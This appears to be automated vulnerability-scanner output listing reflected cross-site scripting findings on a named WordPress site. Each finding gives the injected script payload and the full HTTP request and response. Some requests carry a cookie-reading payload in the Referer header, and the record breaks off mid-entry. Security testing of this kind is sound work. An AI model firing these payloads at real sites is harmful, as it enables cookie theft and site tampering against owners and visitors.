The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b497c"><script>alert(1)</script>b8f47762f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b497c\"><script>alert(1)</script>b8f47762f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js?b497c"><script>alert(1)</script>b8f47762f1=1 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:15:19 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent Last-Modified: Mon, 31 Jan 2011 21:15:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44430
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b04e"><script>alert(1)</script>f1d8e19c41e was submitted in the REST URL parameter 1. This input was echoed as 4b04e\"><script>alert(1)</script>f1d8e19c41e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content4b04e"><script>alert(1)</script>f1d8e19c41e/themes/rt_mynxx_wp/js/mootools.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:01 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aae8c"><script>alert(1)</script>373a71fb8c9 was submitted in the REST URL parameter 2. This input was echoed as aae8c\"><script>alert(1)</script>373a71fb8c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themesaae8c"><script>alert(1)</script>373a71fb8c9/rt_mynxx_wp/js/mootools.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:24 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4663"><script>alert(1)</script>c19256b1321 was submitted in the REST URL parameter 3. This input was echoed as d4663\"><script>alert(1)</script>c19256b1321 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wpd4663"><script>alert(1)</script>c19256b1321/js/mootools.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:48 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 698f7"><script>alert(1)</script>7b051221727 was submitted in the REST URL parameter 4. This input was echoed as 698f7\"><script>alert(1)</script>7b051221727 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js698f7"><script>alert(1)</script>7b051221727/mootools.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:11 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 610e3"><script>alert(1)</script>9e4f995fd8 was submitted in the REST URL parameter 5. This input was echoed as 610e3\"><script>alert(1)</script>9e4f995fd8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/mootools.js610e3"><script>alert(1)</script>9e4f995fd8 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:34 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.233. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.installsoftware.com
Path:
/wp-content/themes/rt_mynxx_wp/js/mootools.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cbfe"><script>alert(1)</script>a2e2aad63fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6cbfe\"><script>alert(1)</script>a2e2aad63fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/mootools.js?6cbfe"><script>alert(1)</script>a2e2aad63fc=1 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:15:19 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent Last-Modified: Mon, 31 Jan 2011 21:15:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44414
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9ae7"><script>alert(1)</script>bc045cc4635 was submitted in the REST URL parameter 1. This input was echoed as f9ae7\"><script>alert(1)</script>bc045cc4635 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-contentf9ae7"><script>alert(1)</script>bc045cc4635/themes/rt_mynxx_wp/js/rokbox/rokbox.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:11 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44389
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3d30"><script>alert(1)</script>d127e7741ba was submitted in the REST URL parameter 2. This input was echoed as c3d30\"><script>alert(1)</script>d127e7741ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themesc3d30"><script>alert(1)</script>d127e7741ba/rt_mynxx_wp/js/rokbox/rokbox.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:34 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44389
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e5e5"><script>alert(1)</script>d1598515b7f was submitted in the REST URL parameter 3. This input was echoed as 3e5e5\"><script>alert(1)</script>d1598515b7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp3e5e5"><script>alert(1)</script>d1598515b7f/js/rokbox/rokbox.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:57 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44389
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb483"><script>alert(1)</script>90adedb165d was submitted in the REST URL parameter 4. This input was echoed as fb483\"><script>alert(1)</script>90adedb165d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/jsfb483"><script>alert(1)</script>90adedb165d/rokbox/rokbox.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:19:12 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:19:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44389
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c74c9"><script>alert(1)</script>4edf3969538 was submitted in the REST URL parameter 5. This input was echoed as c74c9\"><script>alert(1)</script>4edf3969538 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/rokboxc74c9"><script>alert(1)</script>4edf3969538/rokbox.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:19:20 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:19:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44389
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40165"><script>alert(1)</script>d53db6d2961 was submitted in the REST URL parameter 6. This input was echoed as 40165\"><script>alert(1)</script>d53db6d2961 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js40165"><script>alert(1)</script>d53db6d2961 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:19:25 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:19:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44389
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.240. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bd62"><script>alert(1)</script>03e27be1078 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4bd62\"><script>alert(1)</script>03e27be1078 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js?4bd62"><script>alert(1)</script>03e27be1078=1 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:16:39 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent Last-Modified: Mon, 31 Jan 2011 21:16:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44424
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3f1b"><script>alert(1)</script>d214d0ad366 was submitted in the REST URL parameter 1. This input was echoed as d3f1b\"><script>alert(1)</script>d214d0ad366 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-contentd3f1b"><script>alert(1)</script>d214d0ad366/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:48 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45bbe"><script>alert(1)</script>90a104888c5 was submitted in the REST URL parameter 2. This input was echoed as 45bbe\"><script>alert(1)</script>90a104888c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes45bbe"><script>alert(1)</script>90a104888c5/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
